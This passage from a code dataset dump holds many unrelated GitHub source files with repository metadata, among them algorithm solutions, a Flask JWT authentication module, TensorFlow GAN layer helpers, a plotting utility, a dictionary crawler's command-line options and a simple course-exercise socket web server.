output_value)\n","repo_name":"maalleni/checkmk","sub_path":"tests/unit/agents/plugins/test_mk_filestats.py","file_name":"test_mk_filestats.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"7280043369","text":"import pandas as pd\nwith open(\"names.txt\", \"r\") as f:\n ans = f.read()\nx = 1\n\ny = 2\n# ans_ls = ans.replace(\"\\n\",\",\").replace(\"\\t\",\",\")\nval = ans.split(\"\\n\")\nnew = []\nfor a in val:\n if \"\\t\" in a or \"Buy\" == a:\n continue\n else:\n new.append(a)\nprint(new)\ndict_coins = {}\nfor i in range(len(new)):\n # print(i)\n # print(x)\n # print(y)\n if i == x:\n # print(new[x])\n # print(new[y])\n dict_coins[new[x]] = new[y]\n x += 3\n y += 3\nprint(dict_coins)\n\nname = dict_coins.keys()\ndf = pd.DataFrame({'col':name, 'symbol': dict_coins.values()})\ndf.to_csv(\"coin.csv\")","repo_name":"mcazim98/N-A_Fintech_CityHack2022","sub_path":"all_Coins.py","file_name":"all_Coins.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34730748332","text":"import sys\ninput = sys.stdin.readline\n\nn, m = list(map(int, input().split()))\ns = dict()\nt = dict()\n\nfor i in range(n):\n name = input().strip()\n s[i+1] = name\n t[name] = i+1\n\nfor i in range(m):\n q = input().strip()\n if q.isdigit():\n q = int(q)\n print(s[q])\n else:\n print(t[q])","repo_name":"ParkJeongseop/Algorithm","sub_path":"Python/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14907866642","text":"# URL : https://www.acmicpc.net/problem/14501\nimport sys\n\nn = int(input())\narr = [] # 상담 리스트\ndp = [0 for _ in range(n + 2)] # DP 리스트\n\n# 상담 리스트 입력\nfor _ in range(n):\n arr.append(list(map(int, input().split())))\n\nfor i in range(1, n + 2):\n todayFinishJob = [1, 0]\n\n for j in range(len(arr)):\n # 당일에 끝나는 작업이 있다면 전일 실적과, 상담 시작일까지의 수입 + 상담료를 합한 것 중 큰 것 선택\n # 2일엔 1일 실적 VS 2일에 끝나는 작업의 (누적 수당 + 작업 수당)\n # 해당일에 끝나는 작업이 여러개일 수 있음. 
# 수당이 더 큰 작업으로 교체하는 조건 적용해야 함\n if (\n i == j + 1 + arr[j][0]\n and dp[i - todayFinishJob[0]] + todayFinishJob[1]\n < dp[i - arr[j][0]] + arr[j][1]\n ):\n todayFinishJob = arr[j]\n\n dp[i] = max(dp[i - 1], dp[i - todayFinishJob[0]] + todayFinishJob[1])\n\nprint(dp[len(dp) - 1])\n","repo_name":"sjnqkqh/python_algorithm","sub_path":"2022.06/06.15/14501_S3.py","file_name":"14501_S3.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"19529891721","text":"from typing import List, Optional, Dict\n\nfrom .base import BaseCamundaConnector\n\n\nclass ProcessConnector:\n\n def __init__(self, connector: BaseCamundaConnector):\n self.camunda = connector\n\n async def get_process_variables(self, process_id):\n process_variables = await self.camunda.get(f'/process-instance/{process_id}/variables')\n return self.camunda.unpack_variables(process_variables)\n\n async def get_variables_by_activity_instance_id(self, activity_instance_id: str) -> dict:\n body_params = {\"activityInstanceIdIn\": [activity_instance_id]}\n process_variable_descriptions = await self.camunda.post(f'/variable-instance', body_params=body_params)\n result = {description[\"name\"]: description[\"value\"] for description in process_variable_descriptions}\n return result\n","repo_name":"can1can/camunda_external_worker","sub_path":"source/connectors/camunda_connector/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73503393876","text":"import math\n\nWIN_WIDTH = 1920\nWIN_HEIGHT = 1280\n\nMAIN_WIN = (WIN_WIDTH, WIN_HEIGHT)\n\n# Robot characteristics definition block :\n\n# Length of each joint from base to end effector in cm\nROBOT_J1_LEN = 15\nROBOT_J2_LEN = 15\nROBOT_J3_LEN = 15\n\n\n# Maximum distance at which the arm can grab an object in cm\nROBOT_MAX_RANGE = 35\n\n# Angle between each joint and the joint that precedes it (consider vector (1; 0) as the the joint_0)\n# Angles should be expressed in radians (from 0 to π)\n# An angle of 0 rad represents two perfectly aligned joints, pointing in the same direction\nROBOT_J1_ANGLE = 3 * math.pi / 4\nROBOT_J2_ANGLE = math.pi / 2\nROBOT_J3_ANGLE = 2 * math.pi / 3\n\nROBOT_J1_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\nROBOT_J2_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\nROBOT_J3_MAX_ANGLE = (math.pi / 8, 7 * math.pi / 8)\n\n# Joints width\nROBOT_JOINT_WIDTH = 5\n\n# End of definition block\n\nJOINT_SCALE = WIN_WIDTH * 0.16 / ((ROBOT_J1_LEN + ROBOT_J2_LEN + ROBOT_J3_LEN) / 3)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREEN = (0, 255, 0)\n","repo_name":"artiom-gesp/42_projects","sub_path":"Python_Projects/Robot_arm/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"72203342678","text":"from __future__ import print_function\nfrom argparse import RawTextHelpFormatter, ArgumentParser\nfrom argparse_type_check import bool_spelling_check, level_spelling_check\nfrom Model import Crawler\n\nparser = ArgumentParser(description = \"Naver Dictionary Crawler\", formatter_class = RawTextHelpFormatter)\n\nparser.add_argument('-b', '--browser', type = str, default = \"firefox\",\n help = \"\\nCrawling을 할 때 실행할 browser\\n\" +\n \"firefox 또는 chrome 선택 가능\\n\" +\n \"default : 
firefox\\n\\n\")\n\nparser.add_argument('-H', '--headless', type = bool_spelling_check, default = True,\n help = \"\\nBrowser를 headless mode로 실행\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-w', '--words', nargs = '+', type = str, default = None,\n help = \"\\n수집할 영어 단어 - ex) -w \\\"i\\\" \\\"we\\\" \\\"car\\\"\\n\\n\")\n\nparser.add_argument('-F', '--file', type = str, default = None, \n help = \"\\n예문을 수집할 단어들이 저장된 파일. 예제는 ReadMe 참조\\n\" +\n \"arguments words와 file 모두 입력된 경우, file arguments만 사용\\n\\n\")\n\nparser.add_argument('-c', '--csv_file', type = str, default = None,\n help = \"\\n이미 존재하는 csv 파일에 data를 추가\\n\\n\")\n\nparser.add_argument('-d', '--db_file', type = str, default = None,\n help = \"\\n이미 존재하는 sqlite 파일에 data를 추가\\n\\n\")\n\nparser.add_argument('-u', '--user', type = bool_spelling_check, default = True,\n help = \"\\n이용자가 번역에 참여한 예문을 포함\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-t', '--translator', type = bool_spelling_check, default = True,\n help = \"\\n네이버 파파고 번역기가 번역한 예문을 포함\\n\" +\n \"default : True\\n\\n\")\n\nparser.add_argument('-p', '--pages', nargs = '+', type = int, default = None,\n help = \"\\n한 레벨 당 저장할 최대 page 수\\n\" +\n \"숫자 2개를 입력할 시, 크롤링 범위를 나타냄\\n\" +\n \"ex) -p 100 (1 page에서 100 page까지 크롤링)\\n\" +\n \"ex) -p 25 70 (25 page에서 70 page까지 크롤링)\\n\"\n \"default : 1 page에서 100 page까지 크롤링\\n\\n\")\n\nparser.add_argument('-l', '--levels', nargs = '+', type = level_spelling_check, default = None,\n help = \"\\n한 단어 당 저장할 표현 수준 - ex) -l \\\"초급\\\", \\\"고급\\\"\\n\" + \n \"default : all(초급, 중급, 고급)\\n\\n\")\n\nparser.add_argument('-f', '--folder', type = str, default = None,\n help = \"\\n결과를 저장할 folder 위치\\n\" +\n \"default : 현재 위치\\n\\n\")\n\nparser.add_argument('-s', '--sleep', type = float, default = 1,\n help = \"\\n예문과 예문 사이에 휴식 시간 (단위 : 초)\\n\" +\n \"default : 1초\\n\\n\")\n\nparser.add_argument('-P', '--patience', type = float, default = 5,\n help = \"\\n어떤 event가 완전히 로딩될 때까지 기다릴 최대 시간(단위 : 초)\\n\" + \n \"default : 5초\\n\\n\")\n\nargs = parser.parse_args()\nkwargs = vars(args)\n\ncrawler = Crawler(**kwargs)\ncrawler.start_crawling()","repo_name":"leesc912/Crawler","sub_path":"Naver/Dictionary/Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12383258298","text":"import json\nfrom flask import request, _request_ctx_stack\nfrom functools import wraps\nfrom jose import jwt\nfrom urllib.request import urlopen\nimport os\n\nAUTH0_DOMAIN = os.environ['AUTH0_DOMAIN']\nALGORITHMS = os.environ['ALGORITHMS']\nAPI_AUDIENCE = os.environ['API_AUDIENCE']\n\n# AuthError Exception\n'''\nAuthError Exception\nA standardized way to communicate auth failure modes\n'''\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\n# Auth Header\n\ndef get_token_auth_header():\n # Get authorization headers\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError('Authorization header missing', 401)\n\n # Split headers\n try:\n parts = auth.split()\n except:\n raise AuthError('Malformed header', 401)\n\n # Error handling\n if parts[0].lower() != 'bearer':\n raise AuthError('Invalid header: must be of type \"Bearer\"', 401)\n elif len(parts) == 1:\n raise AuthError('Invalid header: authorization token missing', 401)\n elif len(parts) > 2:\n raise AuthError(\n 'Invalid header: authorization header must be bearer 
token', 401\n )\n else:\n # Return token part of header\n return parts[1]\n\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError('Bad request: permissions not included', 400)\n elif permission not in payload['permissions']:\n raise AuthError('Forbidden', 403)\n else:\n return True\n\n\ndef verify_decode_jwt(token):\n\n jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')\n jwks = json.loads(jsonurl.read())\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n\n if 'kid' not in unverified_header:\n raise AuthError('Malformed header', 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError('Token expired', 401)\n\n except jwt.JWTClaimsError:\n raise AuthError(\n 'Incorrect claims. Please check the audience and issuer.', 401\n )\n\n except Exception:\n raise AuthError(\n 'Invalid header: unable to parse authentication token', 400\n )\n\n raise AuthError('Invalid header: unable to find the appropriate key', 400)\n\n\ndef requires_auth(permission=''):\n def requires_auth_decorator(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n token = get_token_auth_header()\n payload = verify_decode_jwt(token)\n check_permissions(permission, payload)\n return f(payload, *args, **kwargs)\n\n return wrapper\n return requires_auth_decorator\n","repo_name":"cameronb123/FSND-capstone","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"13733627454","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef get_weight(shape, variance_scale=2, scale_weight=False):\n stddev = np.sqrt(variance_scale / np.prod(shape[:-1]))\n if scale_weight:\n weight = tf.get_variable(\n name=\"weight\",\n shape=shape,\n initializer=tf.initializers.truncated_normal(0, 1)\n ) * stddev\n else:\n weight = tf.get_variable(\n name=\"weight\",\n shape=shape,\n initializer=tf.initializers.truncated_normal(0, stddev)\n )\n return weight\n\n\ndef get_bias(shape):\n bias = tf.get_variable(\n name=\"bias\",\n shape=shape,\n initializer=tf.initializers.zeros()\n )\n return bias\n\n\ndef dense(inputs, units, use_bias=True, variance_scale=2, scale_weight=False):\n weight = get_weight(\n shape=[inputs.shape[1].value, units],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = tf.matmul(inputs, weight)\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias)\n return inputs\n\n\ndef conv2d(inputs, filters, kernel_size, strides=[1, 1], use_bias=True,\n variance_scale=2, scale_weight=True):\n weight = get_weight(\n shape=[*kernel_size, inputs.shape[1].value, filters],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = tf.nn.conv2d(\n input=inputs,\n filter=weight,\n strides=[1, 1] + strides,\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias, data_format=\"NCHW\")\n return inputs\n\n\ndef conv2d_transpose(inputs, filters, kernel_size, strides=[1, 1], use_bias=True,\n variance_scale=2, 
scale_weight=True):\n weight = get_weight(\n shape=[*kernel_size, inputs.shape[1].value, filters],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n weight = tf.transpose(weight, [0, 1, 3, 2])\n input_shape = np.array(inputs.shape)\n output_shape = [tf.shape(inputs)[0], filters, *input_shape[2:] * strides]\n inputs = tf.nn.conv2d_transpose(\n value=inputs,\n filter=weight,\n output_shape=output_shape,\n strides=[1, 1] + strides,\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n if use_bias:\n bias = get_bias([inputs.shape[1].value])\n inputs = tf.nn.bias_add(inputs, bias, data_format=\"NCHW\")\n return inputs\n\n\ndef upscale2d(inputs, factors=[2, 2]):\n factors = np.asanyarray(factors)\n if (factors == 1).all():\n return inputs\n shape = inputs.shape\n inputs = tf.reshape(inputs, [-1, shape[1], shape[2], 1, shape[3], 1])\n inputs = tf.tile(inputs, [1, 1, 1, factors[0], 1, factors[1]])\n inputs = tf.reshape(inputs, [-1, shape[1], shape[2] * factors[0], shape[3] * factors[1]])\n return inputs\n\n\ndef downscale2d(inputs, factors=[2, 2]):\n # NOTE: requires tf_config[\"graph_options.place_pruned_graph\"] = True\n factors = np.asanyarray(factors)\n if (factors == 1).all():\n return inputs\n inputs = tf.nn.avg_pool(\n value=inputs,\n ksize=[1, 1, *factors],\n strides=[1, 1, *factors],\n padding=\"SAME\",\n data_format=\"NCHW\"\n )\n return inputs\n\n\ndef embedding(inputs, units, variance_scale=2, scale_weight=False):\n weight = get_weight(\n shape=[inputs.shape[1].value, units],\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n inputs = tf.nn.embedding_lookup(weight, tf.argmax(inputs, axis=1))\n return inputs\n\n\ndef pixel_norm(inputs, epsilon=1e-8):\n inputs *= tf.rsqrt(tf.reduce_mean(tf.square(inputs), axis=1, keepdims=True) + epsilon)\n return inputs\n\n\ndef batch_stddev(inputs, group_size=4, epsilon=1e-8):\n shape = inputs.shape\n inputs = tf.reshape(inputs, [group_size, -1, *shape[1:]])\n inputs -= tf.reduce_mean(inputs, axis=0, keepdims=True)\n inputs = tf.square(inputs)\n inputs = tf.reduce_mean(inputs, axis=0)\n inputs = tf.sqrt(inputs + epsilon)\n inputs = tf.reduce_mean(inputs, axis=[1, 2, 3], keepdims=True)\n inputs = tf.tile(inputs, [group_size, 1, *shape[2:]])\n return inputs\n\n\ndef adaptive_instance_norm(inputs, latents, use_bias=True, center=True, scale=True,\n variance_scale=2, scale_weight=True, epsilon=1e-8):\n ''' Adaptive Instance Normalization\n [Arbitrary Style Transfer in Real-time with Adaptive Instance Normalization]\n (https://arxiv.org/pdf/1703.06868.pdf)\n '''\n # standard instance normalization\n inputs -= tf.reduce_mean(inputs, axis=[2, 3], keepdims=True)\n inputs *= tf.rsqrt(tf.reduce_mean(tf.square(inputs), axis=[2, 3], keepdims=True) + epsilon)\n\n if scale:\n with tf.variable_scope(\"scale\"):\n gamma = dense(\n inputs=latents,\n units=inputs.shape[1],\n use_bias=use_bias,\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n gamma = tf.reshape(\n tensor=gamma,\n shape=[-1, gamma.shape[1], 1, 1]\n )\n inputs *= gamma\n\n if center:\n with tf.variable_scope(\"center\"):\n beta = dense(\n inputs=latents,\n units=inputs.shape[1],\n use_bias=use_bias,\n variance_scale=variance_scale,\n scale_weight=scale_weight\n )\n beta = tf.reshape(\n tensor=beta,\n shape=[-1, beta.shape[1], 1, 1]\n )\n inputs += beta\n\n return inputs\n\n\ndef apply_noise(inputs):\n noise = tf.random_normal([tf.shape(inputs)[0], 1, *inputs.shape[2:]])\n weight = tf.get_variable(\n name=\"weight\",\n shape=[inputs.shape[1]],\n 
initializer=tf.initializers.zeros()\n )\n weight = tf.reshape(weight, [1, -1, 1, 1])\n inputs += noise * weight\n return inputs\n","repo_name":"skmhrk1209/PGGAN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"73"} +{"seq_id":"21807842689","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n self.k = k\n self.res = None\n self.helper(root)\n return self.res\n\n def helper(self, node):\n if not node:\n return\n self.helper(node.left)\n self.k -= 1\n if self.k == 0:\n self.res = node.val\n return\n self.helper(node.right)","repo_name":"minas528/interviewPrep","sub_path":"230-kth-smallest-element-in-a-bst/230-kth-smallest-element-in-a-bst.py","file_name":"230-kth-smallest-element-in-a-bst.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"3534688752","text":"from typing import List, Union, Tuple, Dict\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\ndef colorFader(c1,c2,mix=0): #fade (linear interpolate) from color c1 (at mix=0) to c2 (mix=1)\n c1=np.array(mcolors.to_rgb(c1))\n c2=np.array(mcolors.to_rgb(c2))\n return mcolors.to_hex((1-mix)*c1 + mix*c2)\n\n\ndef descriptors(descriptors: List[np.ndarray], groupby: int, figsize: Tuple[int,int] = (16,16), varnames: Union[np.ndarray, list] = None, dimnames: Union[np.ndarray, list] = None, same_scale: bool = True, return_axes: bool = False, grid: bool = True, color_from: Union[str, List[str]] = \"blue\", color_to: Union[str, List[str]] = \"red\", groupcolors: int = None, **kwargs):\n # Rest\n n_features = len(descriptors)\n n_dimensions = descriptors[0].shape[1]//groupby\n if groupcolors is None:\n groupcolors = groupby\n\n # Color range\n if isinstance(color_from, str):\n color_from = [color_from]*n_features\n if isinstance(color_to, str):\n color_to = [color_to]*n_features\n assert (len(color_from) == n_features) and (len(color_from) == n_features), \"The number of specified colors must match the number of descriptors\"\n color_range = [\n [colorFader(mcolors.to_hex(c_from),mcolors.to_hex(c_to),v) for v in np.linspace(0,1,groupcolors)] \n for (c_from,c_to) in zip(color_from,color_to)\n ]\n\n # Initialize figure\n fig,ax = plt.subplots(nrows=n_features,ncols=n_dimensions,figsize=figsize,**kwargs)\n if ax.ndim == 1:\n ax = ax[:,None]\n for i,des in enumerate(descriptors):\n for j,val in enumerate(des.T):\n ax[i,j//groupby].plot(val,color=color_range[i][j%groupcolors])\n ax[i,j//groupby].set_xlim([0,val.size-1])\n \n # Set figure options\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]-1) for j in range(ax.shape[1])]\n [ax[i,j].set_yticks([]) for i in range(ax.shape[0]) for j in range(1,ax.shape[1])]\n if varnames is not None:\n [ax[i,0].set_ylabel(f\"{varnames[i]}\") for i in range(ax.shape[0])]\n else:\n [ax[i,0].set_ylabel(f\"Feat. {i+1}\") for i in range(ax.shape[0])]\n if dimnames is not None:\n [ax[0,j].set_title(f\"{dimnames[j]}\") for j in range(ax.shape[1])]\n else:\n [ax[0,j].set_title(f\"Dim. 
{j+1}\") for j in range(ax.shape[1])]\n # Set figure ylims\n if same_scale and \"sharey\" not in kwargs:\n for i in range(ax.shape[0]):\n ylims = [0,0]\n for j in range(ax.shape[1]):\n ylim = ax[i,j].get_ylim()\n ylims[0] = min([ylims[0],ylim[0]])\n ylims[1] = max([ylims[1],ylim[1]])\n \n for j in range(ax.shape[1]):\n ax[i,j].set_ylim(ylims)\n fig.tight_layout()\n fig.subplots_adjust(hspace=0.01)\n fig.align_ylabels(ax[:,0])\n\n if return_axes:\n return fig,ax\n\n\ndef path(descriptors: List[np.ndarray], figsize=(16,16), varnames: Union[np.ndarray, list] = None, dimnames: Union[np.ndarray, list] = None):\n # Rest\n n_features = len(descriptors)\n n_dimensions = descriptors[0].shape[1]\n\n # Initialize figure\n fig,ax = plt.subplots(nrows=n_features,ncols=n_dimensions,figsize=figsize)\n for i,des in enumerate(descriptors):\n for j,val in enumerate(des.T):\n col = 1/5*(j%5)\n ax[i,j].plot(val,color=[col,0,1-col])\n \n # Set figure options\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]-1) for j in range(ax.shape[1])]\n if varnames is not None:\n [ax[i,0].set_ylabel(f\"{varnames[i]}\") for i in range(ax.shape[0])]\n else:\n [ax[i,0].set_ylabel(f\"Feat. {i+1}\") for i in range(ax.shape[0])]\n if dimnames is not None:\n [ax[0,j].set_title(f\"Point {dimnames[j]}\") for j in range(ax.shape[1])]\n else:\n [ax[0,j].set_title(f\"Point {j+1}\") for j in range(ax.shape[1])]\n [ax[i,j].set_xticks([]) for i in range(ax.shape[0]) for j in range(ax.shape[1])]\n [ax[i,j].set_yticks([]) for i in range(ax.shape[0]) for j in range(ax.shape[1])]\n fig.tight_layout()\n fig.subplots_adjust(hspace=0.01,wspace=0.01)\n fig.align_ylabels(ax[:,0])\n\n\n\n","repo_name":"guillermo-jimenez/PyMKL","sub_path":"PyMKL/plot/__ops.py","file_name":"__ops.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"20308659885","text":"from PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \n\n\n\nclass ThisImage():\n \n def __init__(self, filename, colourLists):\n \n self.img = Image.new(mode = \"RGB\", size = (800, 800))\n self.draw = ImageDraw.Draw(self.img)\n self.font = ImageFont.truetype(\"glitchportal_app/novamono.ttf\", 32)\n NameList = filename.split(\".\")\n self.filename = NameList[0]\n document = open(filename)\n self.lines = document.readlines()\n self.colours = colourLists\n \n def now(self):\n \n saved = False\n print(self.filename + \".jpeg\")\n \n Y = 0\n X = 0\n \n for row in range(0, len(self.lines)):\n Line = self.lines[row].strip(\"\\n\")\n for char in range(0, len(Line)):\n self.draw.text((X, Y),Line[char],self.colours[row][char],font=self.font)\n X += 10\n Y += 16\n X = 0\n \n \n if not saved:\n self.img.save(self.filename + \".jpeg\")\n saved = True\n \n return self.filename + \".jpeg\"\n","repo_name":"RZSZT/test-site","sub_path":"glitchportal_app/showncapture.py","file_name":"showncapture.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71602486316","text":"# License: GNU Affero General Public License v3 or later\n\n# Find all operons belonging to specific subcategories based on pfam2ec and TIGRFAM2ec links\n\nfrom Genes import OperonCollection, CollectionCollection\n\nfrom log import return_logger\nlogger = return_logger(__name__, False)\n\ndef main(operons,domain2ec):\n categories_ec = {\n '2.1': 'Transferring_One-Carbon_Groups',\n '2.2': 
'Transferring_Aldehyde_or_Ketonic_Groups',\n '2.3': 'Acyltransferases',\n '2.4': 'Glycosyltransferases',\n '2.5': 'Transferring_Alkyl_or_Aryl_Groups_Other_than_Methyl_Groups',\n '2.6': 'Transferring_Nitrogenous_Groups',\n '2.7': 'Transferring_Phosphorus-Containing_Groups',\n '2.8': 'Transferring_Sulfur-Containing_Groups'}\n \n categories_domains = {'Halogenase':['PF04820']}\n \n # First convert ec categories to domain categories - i.e. a dict containing a category name and all allowed domains.\n for ec_cl in categories_ec:\n ec_cl_full = 'EC:%s' %ec_cl\n category_name = categories_ec[ec_cl]\n domains = find_ec(domain2ec,ec_cl_full)\n categories_domains[category_name] = domains\n # Now assign the groups to the operons and the operoncollection\n operon_collections = assign_groups_to_operons(operons,categories_domains)\n return operon_collections\n \ndef find_ec(domain2ec,ec_q):\n out = set()\n for dom in domain2ec:\n ecs = domain2ec[dom]\n for ec in ecs:\n if ec_q in ec:\n out.add(dom)\n return(sorted(list(out)))\n \ndef assign_groups_to_operons(operons,categories_domains):\n operons_per_category = {}\n for operon in operons:\n categories = []\n for category in categories_domains:\n domains = categories_domains[category]\n if any([dom in operon.all_domains for dom in domains]):\n categories.append(category)\n if category not in operons_per_category:\n operons_per_category[category] = []\n operons_per_category[category].append(operon)\n operon.EC_groups = categories\n collections_per_group = {}\n for category in operons_per_category:\n operons_group = operons_per_category[category]\n collection = OperonCollection(dict([(operon.name,operon) for operon in operons_group]),collection_type='EC',name=category,\\\n descr='Operons containing a common enzyme class',prep=False)\n collections_per_group[category] = collection\n return collections_per_group\n \n\n\n \n'''Suggested interesting enzymes belonging to EC classes\n2.1 Transferring One-Carbon Groups\n2.2 Transferring Aldehyde or Ketonic Groups\n2.3 Acyltransferases\n2.4 Glycosyltransferases\n2.5 Transferring Alkyl or Aryl Groups, Other than Methyl Groups\n2.6 Transferring Nitrogenous Groups\n2.7 Transferring Phosphorus-Containing Groups\n2.8 Transferring Sulfur-Containing Groups\n\nAdditionally, for halogen transfer\n\nPF04820\tTrp_halogenase\tTryptophan halogenase\n\nPossibly also:\nhttps://www.nature.com/articles/nchembio.1649\n--> PF13640\n--> PF05721\n'''\n\n\n\n","repo_name":"Alexamk/decRiPPter","sub_path":"lib/group_operons_EC.py","file_name":"group_operons_EC.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"33645550761","text":"#!/usr/bin/env python3 \n# encoding: utf-8 \n\"\"\"\n@author: crkylin\n@contact: crkylin@gmail.com \n@site: \n@file: webserver.py \n@time: 4/3/2018 3:02 PM \n\"\"\"\n#import socket module\nfrom socket import *\n#Create a welcome socket\nserverPort = 8081\nserverSocket = socket(AF_INET, SOCK_STREAM)\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is running\")\nwhile True:\n\n connctionSocket, addr = serverSocket.accept()\n try:\n message = connctionSocket.recv(1024)\n fileName = message.split()[1]\n f = open(fileName[1:])\n outputdata = f.read()\n print(outputdata)\n # Send one HTTP header line into socket\n http_response = b\"HTTP/1.1 200 OK\\r\\n\\r\\n\"\n # Send the content of the requeted file to the client\n connctionSocket.sendall(http_response + 
outputdata.encode(\"utf8\"))\n connctionSocket.close()\n\n except IOError:\n # Send response message for file not found\n http_response = b'HTTP/1.1 404 Not Found\\r\\n\\r\\n'\n f = open('404.html')\n outputdata = f.read()\n connctionSocket.send(http_response + outputdata.encode(\"utf8\"))\n\n connctionSocket.close()\n\n\n#DONE! v1.0.1\n#Fix the problem that the server down after a connection close DONE:Do not close the welcome socket after a loop\n","repo_name":"chrolum/Note","sub_path":"computerNetworking/webServer/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11611766216","text":"#! /usr/bin/python\nimport os\n\nfrom utils.setup_toolbox import mac_address, get_serial, get_facility_name\n\n\ndef configure_site():\n \"\"\"\n configures toolbox\n :return:\n \"\"\"\n # Configures the site\n # install pip\n print(\"********************\")\n print(\"*** WELCOME TO TOOBOX-OFFLINE-EXPORTER FOR POINT OF CARE (POC) ***\")\n print(\"Starting ..........\")\n print(\"1. Update modules\")\n answer = os.system(\"sudo apt-get update\")\n print(\"Step 2: Install Pip.\")\n os.system(\"sudo apt install python-pip\")\n print(\"Step3 : install python environment\")\n os.system(\"sudo apt install virtualenv\")\n os.system(\"virtualenv flask\")\n print(\"Downloading requirements requirements .....\")\n #os.system(\". flask/bin/activate && pip install -r requirements.txt \")\n os.system(\"cd packages && pip download -r ../requirements.txt \")\n\n print(\"******************** ABOUT TO FINISH ********************\")\n os.system(\". flask/bin/activate && python -c 'from utils.setup_toolbox import \"\n \"offline_setup; \"\n \"offline_setup()'\")\n print(\"*********** END - OFFLINE SETUP COMPLETE :) !!!! 
*****************\")\n\n return True\n\n\ndef main():\n \"\"\"\n startup function\n :return: boolean\n \"\"\"\n configure_site()\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoxDevOps/toolbox-offline-exporter-poc","sub_path":"offline-setup.py","file_name":"offline-setup.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"44310956908","text":"from tkinter import *\nimport CellClass\n\n\nwidth = height = 720\nw = 40\n\ncols = width // w\nrows = height // w\n\ncells_grid = []\ncells_stek = []\n\nroot = Tk()\ncanvas = Canvas(root, width=width, height=height, bg=\"black\")\ncanvas.pack()\n\nfor i in range(cols):\n for j in range(rows):\n cells_grid.append(CellClass.Cell(i, j, canvas, w))\n\ncurrent = cells_grid[0]\ndef removeWalls(cell1, cell2):\n x = cell1.i - cell2.i\n if x == 1:\n cell1.walls[3] = False\n 